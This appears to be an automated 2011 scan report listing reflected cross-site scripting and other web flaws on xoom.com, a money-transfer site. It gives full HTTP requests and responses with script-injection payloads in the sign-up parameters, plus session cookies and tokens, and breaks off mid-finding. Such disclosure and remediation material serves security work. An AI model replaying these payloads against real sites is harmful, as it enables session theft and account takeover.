XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, xoom.com Report generated by XSS.CX at Thu Nov 10 10:31:32 CST 2011.
Loading
1. Cross-site scripting (reflected)
1.1. https://www.xoom.com/ [name of an arbitrarily supplied request parameter]
1.2. https://www.xoom.com/sendmoneynow/home [name of an arbitrarily supplied request parameter]
1.3. https://www.xoom.com/sendmoneynow/signUp [_action parameter]
1.4. https://www.xoom.com/sendmoneynow/signUp [contactInformation.email.value parameter]
1.5. https://www.xoom.com/sendmoneynow/signUp [contactInformation.firstName.value parameter]
1.6. https://www.xoom.com/sendmoneynow/signUp [contactInformation.lastName.value parameter]
1.7. https://www.xoom.com/sendmoneynow/signUp [contactInformation.phone1.value parameter]
1.8. https://www.xoom.com/sendmoneynow/signUp [emailVerification parameter]
1.9. https://www.xoom.com/sendmoneynow/signUp [first_name parameter]
1.10. https://www.xoom.com/sendmoneynow/signUp [intcid parameter]
1.11. https://www.xoom.com/sendmoneynow/signUp [lastName parameter]
1.12. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
1.13. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
1.14. https://www.xoom.com/sendmoneynow/signUp [name parameter]
1.15. https://www.xoom.com/sendmoneynow/signUp [newPassword parameter]
1.16. https://www.xoom.com/sendmoneynow/signUp [passwordVerification parameter]
1.17. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
1.18. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
1.19. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
1.20. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
1.21. https://www.xoom.com/sendmoneynow/signUp [token parameter]
1.22. https://www.xoom.com/sendmoneynow/signUp [token parameter]
2. XML injection
2.1. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 2]
2.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 3]
2.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 4]
3. Session token in URL
3.1. https://www.xoom.com/sendmoneynow/fp/check.js
3.2. https://www.xoom.com/sendmoneynow/fp/clear.png
3.3. https://www.xoom.com/sendmoneynow/fp/fp.swf
3.4. https://www.xoom.com/sendmoneynow/signUp
4. SSL cookie without secure flag set
4.1. https://www.xoom.com/sendmoneynow/home
4.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
4.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
4.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
4.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
4.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
5. Cookie scoped to parent domain
6. Cross-domain Referer leakage
7. Cross-domain script include
7.1. https://www.xoom.com/sendmoneynow/help/help-center
7.2. https://www.xoom.com/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
7.3. https://www.xoom.com/sendmoneynow/home
7.4. https://www.xoom.com/sendmoneynow/signUp
8. Cookie without HttpOnly flag set
8.1. https://www.xoom.com/sendmoneynow/home
8.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
8.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
8.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
8.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
8.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
9. Cacheable HTTPS response
1. Cross-site scripting (reflected)
next
There are 22 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. https://www.xoom.com/ [name of an arbitrarily supplied request parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f65"><script>alert(1)</script>c53dbe7ef5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?b4f65"><script>alert(1)</script>c53dbe7ef5a =1 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:21 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:21 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "08c1919f51149ff1c5773066d6bf36817" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:14 GMT Content-Length: 34273 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... <a href="?b4f65"><script>alert(1)</script>c53dbe7ef5a =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.2. https://www.xoom.com/sendmoneynow/home [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bf6"><script>alert(1)</script>90ad5d5fb73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendmoneynow/home?15bf6"><script>alert(1)</script>90ad5d5fb73 =1 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: xab=91605982107887; BIGipServerprod-http-xoom=436274186.20480.0000
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:28 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:28 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0ad715009feafddfe107b88bb09490564" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Wed, 09 Nov 2011 22:10:21 GMT Content-Length: 34262 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... <a href="?15bf6"><script>alert(1)</script>90ad5d5fb73 =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.3. https://www.xoom.com/sendmoneynow/signUp [_action parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the _action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7694e"><script>alert(1)</script>0d88741f7379e7c03 was submitted in the _action parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp7694e"><script>alert(1)</script>0d88741f7379e7c03 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4C4808815017B2672548BEC87D310563; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:37 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:37 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "01f1cc08d2ec81b592b4f51e3f90eb0bf" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:29 GMT Content-Length: 29980 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?lastName=&_action=signUp7694e"><script>alert(1)</script>0d88741f7379e7c03 &phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bb...[SNIP]...
1.4. https://www.xoom.com/sendmoneynow/signUp [contactInformation.email.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.email.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1253"><script>alert(1)</script>4cb20ceecb5abc825 was submitted in the contactInformation.email.value parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=a1253"><script>alert(1)</script>4cb20ceecb5abc825 &name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=68F4A810777486E779010ABC8AE5B89E; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:31 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:31 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0e15c49cf251ae27de458a748f1115d79" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:24 GMT Content-Length: 29978 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... <a href="?lastName=&_action=signUp&phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=a1253"><script>alert(1)</script>4cb20ceecb5abc825 &countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.val...[SNIP]...
1.5. https://www.xoom.com/sendmoneynow/signUp [contactInformation.firstName.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.firstName.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9591f"><script>alert(1)</script>fd6e93582d8cef5b6 was submitted in the contactInformation.firstName.value parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=9591f"><script>alert(1)</script>fd6e93582d8cef5b6 &contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=03608BD9BE01860CEB9378E837F0ED50; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:29 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:29 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0be131e5e8a5fb357dbb009074ddc8d19" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:22 GMT Content-Length: 29990 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... ication=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=9591f"><script>alert(1)</script>fd6e93582d8cef5b6 &name=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.6. https://www.xoom.com/sendmoneynow/signUp [contactInformation.lastName.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.lastName.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85a9"><script>alert(1)</script>c3eb732814ac42400 was submitted in the contactInformation.lastName.value parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=c85a9"><script>alert(1)</script>c3eb732814ac42400 &contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3D983309835AE7645C897288ECE43E57; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:30 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:30 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0edca277ea93e8f17aac401198373d706" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:23 GMT Content-Length: 29874 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... 2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=c85a9"><script>alert(1)</script>c3eb732814ac42400 &languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.7. https://www.xoom.com/sendmoneynow/signUp [contactInformation.phone1.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.phone1.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1938"><script>alert(1)</script>59ac63e2d322439b2 was submitted in the contactInformation.phone1.value parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
